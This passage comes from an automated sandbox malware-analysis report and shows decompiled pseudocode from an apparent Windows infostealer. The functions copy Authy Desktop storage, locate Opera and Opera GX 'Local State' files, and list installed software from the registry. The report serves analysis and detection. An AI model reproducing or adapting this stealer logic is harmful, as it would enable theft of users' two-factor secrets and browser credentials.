                                                                                						E004175C4( *((intOrPtr*)(_t379 - 0x184)), _t379 - 0x128);
                                                                                						 *((char*)(_t379 - 4)) = 0x13;
                                                                                						E0040E32E(_t338);
                                                                                						_t338 = _t379 - 0xd4;
                                                                                						 *((char*)(_t379 - 4)) = 0x14;
                                                                                						E0040E34B(_t198, _t379 - 0xd4);
                                                                                						 *((char*)(_t379 - 4)) = 0x15;
                                                                                						_t205 = E0040E32E(_t379 - 0xd4);
                                                                                						 *((char*)(_t379 - 4)) = 0x16;
                                                                                						_t356 = E0040E2B0(_t379 - 0x10c, _t379 - 0x80, _t205, _t379 - 0x80);
                                                                                						 *((char*)(_t379 - 4)) = 0x17;
                                                                                						 *((intOrPtr*)(_t379 - 0x19c)) = E00417554(_t379 - 0x80, _t379 - 0xd4, _t379 - 0x144);
                                                                                						_push("\\Authy Desktop\\Local Storage\\leveldb\\");
                                                                                						_push(_t379 - 0x17c);
                                                                                						 *((char*)(_t379 - 4)) = 0x18;
                                                                                						E0040D337(_t285, _t379 - 0x48, _t356, _t396);
                                                                                						 *((char*)(_t379 - 4)) = 0x19;
                                                                                						_t214 = E0040D431( *((intOrPtr*)(_t379 - 0x19c)), _t379 - 0x160);
                                                                                						 *((char*)(_t379 - 4)) = 0x1a;
                                                                                						_t215 = E004175C4(_t214, _t379 - 0x64);
                                                                                						if(_t356[0xa] >= 8) {
                                                                                							_t356 =  *_t356;
                                                                                						}
                                                                                						if(_t215[0xa] >= 8) {
                                                                                							_t215 =  *_t215;
                                                                                						}
                                                                                						CopyFileW(_t215, _t356, 1);
                                                                                						_t342 = 0;
                                                                                						E00403960(0, _t379 - 0x64, 1);
                                                                                						E00402C34(_t379 - 0x160, 1, _t285);
                                                                                						E00402C34(_t379 - 0x17c, 1, _t285);
                                                                                						E00402C34(_t379 - 0x144, 1, _t285);
                                                                                						E00403960(0, _t379 - 0x10c, 1);
                                                                                						E00403960(0, _t379 - 0xf0, 1);
                                                                                						E00403960(0, _t379 - 0xd4, 1);
                                                                                						E00403960(0, _t379 - 0xb8, 1);
                                                                                						E00403960(0, _t379 - 0x128, 1);
                                                                                						E00403960(0, _t379 - 0x9c, 1);
                                                                                						E00402C34(_t379 - 0x2c, 1, _t285);
                                                                                						_t353 = _t379 - 0x80;
                                                                                						 *((char*)(_t379 - 4)) = 1;
                                                                                						E00403960(0, _t379 - 0x80, 1);
                                                                                						 *(_t379 - 0x180) =  *(_t379 - 0x180) + 0x1c;
                                                                                					} while ( *(_t379 - 0x180) !=  *(_t379 - 0x188));
                                                                                				}
                                                                                				_t178 =  *(_t379 - 0x198);
                                                                                				if( *(_t379 - 0x198) != _t285) {
                                                                                					E0040E28F(_t178,  *(_t379 - 0x194));
                                                                                					_push( *(_t379 - 0x198));
                                                                                					E0041DFFD();
                                                                                				}
                                                                                				 *(_t379 - 0x198) = _t285;
                                                                                				 *(_t379 - 0x194) = _t285;
                                                                                				 *(_t379 - 0x190) = _t285;
                                                                                				E00402C34(_t379 - 0x48, 1, _t285);
                                                                                				return E00421A61(_t285, _t342, _t353);
                                                                                			}
































                                                                                0x00411ba2
                                                                                0x00411ba4
                                                                                0x00411baa
                                                                                0x00411bac
                                                                                0x00411baf
                                                                                0x00411baf
                                                                                0x00411bb6
                                                                                0x00411bba
                                                                                0x00411bbf
                                                                                0x00411bc4
                                                                                0x00411bc9
                                                                                0x00411bcc
                                                                                0x00411bd1
                                                                                0x00411bd2
                                                                                0x00411bd8
                                                                                0x00411bde
                                                                                0x00411be4
                                                                                0x00411bec
                                                                                0x00411bf8
                                                                                0x00411bf8
                                                                                0x00411bfb
                                                                                0x00411c01
                                                                                0x00411c0a
                                                                                0x00411c0f
                                                                                0x00411c18
                                                                                0x00411c1d
                                                                                0x00411c1e
                                                                                0x00411c22
                                                                                0x00411c27
                                                                                0x00411c2d
                                                                                0x00411c2f
                                                                                0x00411c2f
                                                                                0x00411c39
                                                                                0x00411c41
                                                                                0x00411c49
                                                                                0x00411c4e
                                                                                0x00411c4f
                                                                                0x00411c54
                                                                                0x00411c5a
                                                                                0x00411c5c
                                                                                0x00411c5c
                                                                                0x00411c60
                                                                                0x00411c68
                                                                                0x00411c77
                                                                                0x00411c7e
                                                                                0x00411c81
                                                                                0x00411c84
                                                                                0x00411c93
                                                                                0x00411c97
                                                                                0x00411cab
                                                                                0x00411caf
                                                                                0x00411cba
                                                                                0x00411cbe
                                                                                0x00411cc7
                                                                                0x00411ccd
                                                                                0x00411cd1
                                                                                0x00411cdc
                                                                                0x00411ce0
                                                                                0x00411cf1
                                                                                0x00411cfb
                                                                                0x00411d07
                                                                                0x00411d10
                                                                                0x00411d1c
                                                                                0x00411d21
                                                                                0x00411d25
                                                                                0x00411d29
                                                                                0x00411d3e
                                                                                0x00411d42
                                                                                0x00411d4b
                                                                                0x00411d4f
                                                                                0x00411d58
                                                                                0x00411d5a
                                                                                0x00411d5a
                                                                                0x00411d60
                                                                                0x00411d62
                                                                                0x00411d62
                                                                                0x00411d68
                                                                                0x00411d70
                                                                                0x00411d75
                                                                                0x00411d85
                                                                                0x00411d92
                                                                                0x00411d9f
                                                                                0x00411dab
                                                                                0x00411db8
                                                                                0x00411dc5
                                                                                0x00411dd2
                                                                                0x00411ddf
                                                                                0x00411dec
                                                                                0x00411df7
                                                                                0x00411dfe
                                                                                0x00411e01
                                                                                0x00411e05
                                                                                0x00411e0a
                                                                                0x00411e17
                                                                                0x00411c01
                                                                                0x00411e23
                                                                                0x00411e2b
                                                                                0x00411e33
                                                                                0x00411e38
                                                                                0x00411e3e
                                                                                0x00411e43
                                                                                0x00411e4a
                                                                                0x00411e50
                                                                                0x00411e56
                                                                                0x00411e5c
                                                                                0x00411e66

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004118AE
                                                                                • __wgetenv.LIBCMT ref: 004118C0
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                  • Part of subcall function 0041778D: __EH_prolog3_GS.LIBCMT ref: 00417797
                                                                                  • Part of subcall function 0041778D: FindFirstFileW.KERNEL32(00000000,?,?), ref: 004177CB
                                                                                  • Part of subcall function 0041778D: FindNextFileW.KERNEL32(?,?,00000001,?,00000001), ref: 0041784B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,\Opera GX Stable\,?,\Opera Stable\,?,?,?,?,00000000), ref: 0041196E
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,00000000), ref: 00411995
                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,files\Soft\AuthyNew,00000013,00000001,00000000), ref: 00411D68
                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,files\Soft\Authy,00000010,00000001,00000000,?,?,?,?,00000000), ref: 00411A9D
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 00403960: _memmove.LIBCMT ref: 0040397A
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,\Opera GX Stable\,?), ref: 00411C39
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,\Opera GX Stable\), ref: 00411C60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateDirectoryFile$CopyFindH_prolog3__memmove$FirstH_prolog3Next__wgetenv
                                                                                • String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\Authy Desktop\Local Storage\leveldb\$\Authy Desktop\Local Storage\leveldb\*$\files\Soft$\files\Soft\Authy$\files\Soft\AuthyNew$files\Soft\Authy$files\Soft\AuthyNew
                                                                                • API String ID: 3262973198-1538576089
                                                                                • Opcode ID: 5e05d7e298b713f4d04a40a79522251ee664bf33a0ff97227a87ce56e219096f
                                                                                • Instruction ID: 36fab18b497e85dbfc4d7542b53a560fd78f9cf0078a9a0cee02ce675f6ee358
                                                                                • Opcode Fuzzy Hash: 5e05d7e298b713f4d04a40a79522251ee664bf33a0ff97227a87ce56e219096f
                                                                                • Instruction Fuzzy Hash: AFF14F71D0525C9EDB24DBA5CD81BDDBBB8AF05308F1040AAE508B7291DA786F88CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
                                                                                			E004156FB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				long _t69;
                                                                                				long _t79;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				void* _t131;
                                                                                				void* _t132;
                                                                                				void* _t133;
                                                                                
                                                                                				_t133 = __eflags;
                                                                                				_push(0xcf8);
                                                                                				E00421A14(E00436DE6, __ebx, __edi, __esi);
                                                                                				 *(_t131 - 0xc40) = 0;
                                                                                				 *((intOrPtr*)(_t131 - 0xc50)) =  *((intOrPtr*)(_t131 + 8));
                                                                                				 *((intOrPtr*)(_t131 - 0xc24)) = 0xf;
                                                                                				 *((intOrPtr*)(_t131 - 0xc28)) = 0;
                                                                                				 *((char*)(_t131 - 0xc38)) = 0;
                                                                                				E00403A16(_t131 - 0xc38, _t133, 0x43e028, 0);
                                                                                				_push(_t131 - 0xd04);
                                                                                				 *((intOrPtr*)(_t131 - 4)) = 1;
                                                                                				E0041687E(0, _t131 - 0xc38, __edi, 1, _t133);
                                                                                				E00402C34(_t131 - 0xc38, 1, 0);
                                                                                				 *((char*)(_t131 - 4)) = 4;
                                                                                				 *(_t131 - 0xc48) = 0;
                                                                                				 *(_t131 - 0xc44) = 0;
                                                                                				 *(_t131 - 0xc54) = 0;
                                                                                				 *(_t131 - 0xc58) = 0xf003f;
                                                                                				 *(_t131 - 0xc3c) = 0;
                                                                                				_t69 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019, _t131 - 0xc48);
                                                                                				_t134 = _t69;
                                                                                				if(_t69 == 0) {
                                                                                					 *(_t131 - 0xc4c) = 0;
                                                                                					while(1) {
                                                                                						__eflags =  *(_t131 - 0xc54);
                                                                                						if(__eflags != 0) {
                                                                                							break;
                                                                                						}
                                                                                						 *(_t131 - 0xc3c) = 0x400;
                                                                                						_t79 = RegEnumKeyExA( *(_t131 - 0xc48),  *(_t131 - 0xc4c), _t131 - 0x81c, _t131 - 0xc3c, 0, 0, 0, 0);
                                                                                						 *(_t131 - 0xc54) = _t79;
                                                                                						__eflags = _t79;
                                                                                						if(_t79 != 0) {
                                                                                							L11:
                                                                                							 *(_t131 - 0xc4c) =  *(_t131 - 0xc4c) + 1;
                                                                                							continue;
                                                                                						}
                                                                                						wsprintfA(_t131 - 0xc1c, "%s\\%s", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", _t131 - 0x81c);
                                                                                						_t132 = _t132 + 0x10;
                                                                                						__eflags = RegOpenKeyExA(0x80000002, _t131 - 0xc1c, 0, 0x20019, _t131 - 0xc44);
                                                                                						if(__eflags == 0) {
                                                                                							 *(_t131 - 0xc3c) = 0x400;
                                                                                							__eflags = RegQueryValueExA( *(_t131 - 0xc44), "DisplayName", 0, _t131 - 0xc58, _t131 - 0x41c, _t131 - 0xc3c);
                                                                                							if(__eflags == 0) {
                                                                                								_push(_t131 - 0x41c);
                                                                                								_push(_t131 - 0xcf4);
                                                                                								E00416DEA(0, 0x80000002, 0x20019, __eflags);
                                                                                								 *(_t131 - 0xc3c) = 0x400;
                                                                                								__eflags = RegQueryValueExA( *(_t131 - 0xc44), "DisplayVersion", 0, _t131 - 0xc58, _t131 - 0x41c, _t131 - 0xc3c);
                                                                                								if(__eflags == 0) {
                                                                                									_push(" [");
                                                                                									_push(_t131 - 0xcf4);
                                                                                									_t100 = E00416DEA(0, 0x80000002, 0x20019, __eflags);
                                                                                									_push(_t131 - 0x41c);
                                                                                									_push(_t100);
                                                                                									_t101 = E00416DEA(0, 0x80000002, 0x20019, __eflags);
                                                                                									_push("]");
                                                                                									_push(_t101);
                                                                                									E00415504(0, 0x80000002, _t131, E00416DEA(0, 0x80000002, 0x20019, __eflags));
                                                                                								}
                                                                                							}
                                                                                							RegCloseKey( *(_t131 - 0xc44));
                                                                                							goto L11;
                                                                                						}
                                                                                						RegCloseKey( *(_t131 - 0xc44));
                                                                                						RegCloseKey( *(_t131 - 0xc48));
                                                                                						L13:
                                                                                						_t126 =  *((intOrPtr*)(_t131 - 0xc50));
                                                                                						_push(_t131 - 0xd04);
                                                                                						E00416915(0,  *((intOrPtr*)(_t131 - 0xc50)), 0x20019, __eflags);
                                                                                						_t57 = _t131 - 0xc40;
                                                                                						 *_t57 =  *(_t131 - 0xc40) | 0x00000001;
                                                                                						__eflags =  *_t57;
                                                                                						L14:
                                                                                						 *((char*)(_t131 - 4)) = 0;
                                                                                						E0040B593(_t131 - 0xd04, 0, _t126);
                                                                                						return E00421A70(0, _t126, 0x20019);
                                                                                					}
                                                                                					RegCloseKey( *(_t131 - 0xc48));
                                                                                					 *((intOrPtr*)(_t131 - 4)) = 3;
                                                                                					goto L13;
                                                                                				}
                                                                                				_t126 =  *((intOrPtr*)(_t131 - 0xc50));
                                                                                				_push(_t131 - 0xd04);
                                                                                				E00416915(0,  *((intOrPtr*)(_t131 - 0xc50)), 0x20019, _t134);
                                                                                				 *(_t131 - 0xc40) = 1;
                                                                                				goto L14;
                                                                                			}










                                                                                0x00415863
                                                                                0x0041586f
                                                                                0x0041596e
                                                                                0x0041596e
                                                                                0x0041597a
                                                                                0x0041597b
                                                                                0x00415980
                                                                                0x00415980
                                                                                0x00415980
                                                                                0x00415987
                                                                                0x0041598d
                                                                                0x00415990
                                                                                0x0041599c
                                                                                0x0041599c
                                                                                0x00415950
                                                                                0x00415956
                                                                                0x00000000
                                                                                0x00415956
                                                                                0x004157b1
                                                                                0x004157bd
                                                                                0x004157be
                                                                                0x004157c3
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00415705
                                                                                  • Part of subcall function 0041687E: __EH_prolog3.LIBCMT ref: 00416885
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000001,00000000,?), ref: 004157A7
                                                                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000), ref: 0041580C
                                                                                • wsprintfA.USER32 ref: 00415839
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,0040B529,?,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 00415853
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 00415863
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0041586F
                                                                                  • Part of subcall function 00416915: __EH_prolog3_GS.LIBCMT ref: 0041691C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$EnumH_prolog3H_prolog3_H_prolog3_catch__memmovewsprintf
                                                                                • String ID: %s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 1626441260-3437733507
                                                                                • Opcode ID: 74ba69e5efe333a53b706f35157785c4d0df42311a90a4e3878e7611e4b5dc2d
                                                                                • Instruction ID: 15cbd451e1a085848f5e9e7532ebf4a77cd73ce1decbcd6b2afacde998f3abde
                                                                                • Opcode Fuzzy Hash: 74ba69e5efe333a53b706f35157785c4d0df42311a90a4e3878e7611e4b5dc2d
                                                                                • Instruction Fuzzy Hash: B36107B584012CEAEB299F55CD85EDEB7B8FB04314F1042EAE109A2151DF389FC98F19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E004139E8(void* __ebx, char* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t92;
                                                                                				WCHAR* _t98;
                                                                                				signed char _t99;
                                                                                				void* _t111;
                                                                                				void* _t116;
                                                                                				void* _t117;
                                                                                				intOrPtr _t118;
                                                                                				char* _t125;
                                                                                				char* _t127;
                                                                                				void* _t134;
                                                                                				void* _t140;
                                                                                				void* _t141;
                                                                                				void* _t143;
                                                                                				void* _t144;
                                                                                
                                                                                				_t125 = __edx;
                                                                                				E004219DE(E004372D8, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t140 - 0x374)) =  *((intOrPtr*)(_t140 + 8));
                                                                                				 *((intOrPtr*)(_t140 - 0x378)) =  *((intOrPtr*)(_t140 + 0xc));
                                                                                				 *((intOrPtr*)(_t140 - 0x364)) =  *((intOrPtr*)(_t140 + 0x10));
                                                                                				 *((intOrPtr*)(_t140 - 0x370)) = 0;
                                                                                				 *((intOrPtr*)(_t140 - 0x368)) = 0;
                                                                                				E00427E30(_t140 - 0x220, 0, 0x104);
                                                                                				E00427E30(_t140 - 0x328, 0, 0x104);
                                                                                				_t143 = _t141 + 0x18;
                                                                                				_t116 = 0x1a;
                                                                                				E00417B4D(_t116);
                                                                                				_t127 = "\\Opera Software\\";
                                                                                				 *0x44a1b8(_t140 - 0x220, _t127, _t140 - 0x220, 0x370);
                                                                                				 *0x44a1b8(_t140 - 0x220,  *((intOrPtr*)(_t140 - 0x364)));
                                                                                				_push("\\Opera Stable\\");
                                                                                				_push( *((intOrPtr*)(_t140 - 0x364)));
                                                                                				 *((intOrPtr*)(_t140 - 0x36c)) = 0;
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					 *((intOrPtr*)(_t140 - 0x36c)) = 1;
                                                                                				}
                                                                                				_push("\\Opera GX Stable\\");
                                                                                				_push( *((intOrPtr*)(_t140 - 0x364)));
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					 *((intOrPtr*)(_t140 - 0x36c)) = 2;
                                                                                				}
                                                                                				_t117 = 0x1a;
                                                                                				E00417B4D(_t117);
                                                                                				 *0x44a1b8(_t140 - 0x328, _t127, _t140 - 0x328);
                                                                                				E00427E30(_t140 - 0x118, 0, 0x104);
                                                                                				_t144 = _t143 + 0xc;
                                                                                				 *0x44a1b8(_t140 - 0x118, _t140 - 0x220);
                                                                                				 *0x44a1b8(_t140 - 0x118, "\\Local State");
                                                                                				_t92 = _t140 - 0x118;
                                                                                				 *((intOrPtr*)(_t140 - 0x330)) = 0xf;
                                                                                				 *((intOrPtr*)(_t140 - 0x334)) = 0;
                                                                                				 *((char*)(_t140 - 0x344)) = 0;
                                                                                				_t134 = _t92 + 1;
                                                                                				do {
                                                                                					_t118 =  *_t92;
                                                                                					_t92 = _t92 + 1;
                                                                                					_t149 = _t118;
                                                                                				} while (_t118 != 0);
                                                                                				E00403A16(_t140 - 0x344, _t149, _t140 - 0x118, _t92 - _t134);
                                                                                				 *(_t140 - 4) = 0;
                                                                                				_t98 = E004175C4(_t140 - 0x344, _t140 - 0x360);
                                                                                				if(_t98[0xa] >= 8) {
                                                                                					_t98 =  *_t98;
                                                                                				}
                                                                                				_t99 = GetFileAttributesW(_t98);
                                                                                				if(_t99 == 0xffffffff) {
                                                                                					L10:
                                                                                					 *((intOrPtr*)(_t140 - 0x364)) = 0;
                                                                                					goto L11;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t140 - 0x364)) = 1;
                                                                                					if((_t99 & 0x00000010) == 0) {
                                                                                						L11:
                                                                                						_t135 = _t140 - 0x360;
                                                                                						E00403960(0, _t140 - 0x360, 1);
                                                                                						 *(_t140 - 4) =  *(_t140 - 4) | 0xffffffff;
                                                                                						E00402C34(_t140 - 0x344, 1, 0);
                                                                                						_t153 =  *((intOrPtr*)(_t140 - 0x364));
                                                                                						if( *((intOrPtr*)(_t140 - 0x364)) != 0) {
                                                                                							_push(_t140 - 0x368);
                                                                                							_push(_t140 - 0x118);
                                                                                							_t111 = E0040F7A2(0, _t140 - 0x370, 0, _t135, _t153);
                                                                                							_t154 = _t111;
                                                                                							if(_t111 == 0) {
                                                                                								E0040F708(_t140 - 0x370, _t140 - 0x368);
                                                                                							}
                                                                                						}
                                                                                						_t136 =  *((intOrPtr*)(_t140 - 0x374));
                                                                                						E00410EAE( *((intOrPtr*)(_t140 - 0x374)), _t125, 0x43e028, _t140 - 0x220,  *((intOrPtr*)(_t140 - 0x378)),  *((intOrPtr*)(_t140 - 0x370)),  *((intOrPtr*)(_t140 - 0x368)));
                                                                                						_push( *((intOrPtr*)(_t140 - 0x36c)));
                                                                                						_t145 = _t144 - 0x1c;
                                                                                						 *((intOrPtr*)(_t140 - 0x36c)) = _t144 - 0x1c;
                                                                                						E0040410F(_t145, _t136 + 8);
                                                                                						_push( *((intOrPtr*)(_t140 - 0x378)));
                                                                                						E00413046(_t140 - 0x328,  *((intOrPtr*)(_t140 - 0x374)),  *((intOrPtr*)(_t140 - 0x374)), _t145, _t154);
                                                                                						E0040F708(_t140 - 0x370, _t140 - 0x368);
                                                                                						return E00421A61(_t140 - 0x328, _t140 - 0x370, _t140 - 0x368);
                                                                                					}
                                                                                					goto L10;
                                                                                				}
                                                                                			}


















                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004139F2
                                                                                • _memset.LIBCMT ref: 00413A2E
                                                                                • _memset.LIBCMT ref: 00413A3F
                                                                                  • Part of subcall function 00417B4D: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00413DBC,014A10F8,00413DBC,?,?,?,?,?,?,?), ref: 00417B63
                                                                                • lstrcat.KERNEL32(?,\Opera Software\), ref: 00413A63
                                                                                • lstrcat.KERNEL32(?,?), ref: 00413A76
                                                                                • StrCmpCA.SHLWAPI(?,\Opera Stable\,?,?,?,00414013,?,\Opera Stable\,?,?,?,?,00000000), ref: 00413A8D
                                                                                • StrCmpCA.SHLWAPI(?,\Opera GX Stable\,?,?,?,00414013,?,\Opera Stable\,?,?,?,?,00000000), ref: 00413AAC
                                                                                • lstrcat.KERNEL32(?,\Opera Software\), ref: 00413AD7
                                                                                • _memset.LIBCMT ref: 00413AE6
                                                                                • lstrcat.KERNEL32(?,?), ref: 00413AFC
                                                                                • lstrcat.KERNEL32(?,\Local State), ref: 00413B0E
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00413B6D
                                                                                  • Part of subcall function 00413046: __EH_prolog3.LIBCMT ref: 0041304D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$_memset$AttributesFileFolderH_prolog3H_prolog3_Path
                                                                                • String ID: \Local State$\Opera GX Stable\$\Opera Software\$\Opera Stable\
                                                                                • API String ID: 2266200472-3706290991
                                                                                • Opcode ID: 57e0b6db6846a2362512121cfd9c52a056200afcee029d1c98b7a0d41764ad48
                                                                                • Instruction ID: 47b8a02ea4a113b847b1a700a10ac577532edc2169a5fc858bead9af8b93c494
                                                                                • Opcode Fuzzy Hash: 57e0b6db6846a2362512121cfd9c52a056200afcee029d1c98b7a0d41764ad48
                                                                                • Instruction Fuzzy Hash: 8F6139B1D0422CABDB229F64DC85BDAB7BCBF08714F0041EAA519A3151DA75AFC4CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E00409D7B(void* __edx, void* __eflags, char _a4) {
                                                                                				signed int _v12;
                                                                                				char _v5016;
                                                                                				char _v55016;
                                                                                				char _v60016;
                                                                                				char _v75016;
                                                                                				char _v90016;
                                                                                				intOrPtr _v90020;
                                                                                				char _v90024;
                                                                                				char _v90028;
                                                                                				intOrPtr _v90032;
                                                                                				intOrPtr _v90036;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t43;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t62;
                                                                                				char* _t65;
                                                                                				intOrPtr _t68;
                                                                                				intOrPtr _t71;
                                                                                				intOrPtr _t74;
                                                                                				intOrPtr _t76;
                                                                                				signed int _t77;
                                                                                				void* _t94;
                                                                                				signed int _t97;
                                                                                				void* _t98;
                                                                                				void* _t103;
                                                                                
                                                                                				_t94 = __edx;
                                                                                				E00430D40(0x15fb0);
                                                                                				_t43 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t43 ^ _t97;
                                                                                				_v90024 = _a4;
                                                                                				E00427E30( &_v55016, 0, 0xc350);
                                                                                				E00427E30( &_v60016, 0, 0x1388);
                                                                                				E00427E30( &_v5016, 0, 0x1388);
                                                                                				E00427E30( &_v90016, 0, 0x3a98);
                                                                                				E00427E30( &_v75016, 0, 0x3a98);
                                                                                				_t103 = _t98 + 0x3c;
                                                                                				 *0x44a1b8( &_v55016, _v90024);
                                                                                				_t60 = E0041F145(0, _t94, 0x1388,  &_v55016, ";",  &_v90028);
                                                                                				_v90024 = 1;
                                                                                				while(1) {
                                                                                					_t103 = _t103 + 0xc;
                                                                                					_v90020 = _t60;
                                                                                					if(_t60 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t62 = _v90024 - 1;
                                                                                					__eflags = _t62;
                                                                                					if(_t62 == 0) {
                                                                                						E00427E30( &_v60016, 0, 0x1388);
                                                                                						_t65 =  &_v60016;
                                                                                						L13:
                                                                                						_t103 = _t103 + 0xc;
                                                                                						 *0x44a1b8(_t65, _v90020);
                                                                                						L14:
                                                                                						_t36 =  &_v90024;
                                                                                						 *_t36 = _v90024 + 1;
                                                                                						__eflags =  *_t36;
                                                                                						_t60 = E0041F145(0, _t94, 0x1388, 0, ";",  &_v90028);
                                                                                						continue;
                                                                                					}
                                                                                					_t68 = _t62 - 1;
                                                                                					__eflags = _t68;
                                                                                					if(_t68 == 0) {
                                                                                						E00427E30( &_v5016, 0, 0x1388);
                                                                                						_t65 =  &_v5016;
                                                                                						goto L13;
                                                                                					}
                                                                                					_t71 = _t68 - 1;
                                                                                					__eflags = _t71;
                                                                                					if(_t71 == 0) {
                                                                                						E00427E30( &_v90016, 0, 0x3a98);
                                                                                						_t65 =  &_v90016;
                                                                                						goto L13;
                                                                                					} else {
                                                                                						_t74 = _t71 - 1;
                                                                                						__eflags = _t74;
                                                                                						if(_t74 == 0) {
                                                                                							_push(_v90020);
                                                                                							_v90036 = E0041F2F3();
                                                                                						} else {
                                                                                							_t76 = _t74 - 1;
                                                                                							__eflags = _t76;
                                                                                							if(_t76 == 0) {
                                                                                								_t77 =  *0x44a1d8(_v90020, "true");
                                                                                								asm("sbb eax, eax");
                                                                                								_v90032 =  ~_t77 + 1;
                                                                                							} else {
                                                                                								__eflags = _t76 == 1;
                                                                                								if(_t76 == 1) {
                                                                                									E00427E30( &_v75016, 0, 0x3a98);
                                                                                									 *0x44a1b8( &_v75016, _v90020);
                                                                                									E004099F2( &_v60016, _t94, __eflags, _v90036,  &_v5016,  &_v90016, _v90032, _v90020);
                                                                                									_t103 = _t103 + 0x20;
                                                                                									_v90024 = 0;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                				return E0041DEB4(_t60, 0, _v12 ^ _t97, _t94, 0x1388, 0x3a98);
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
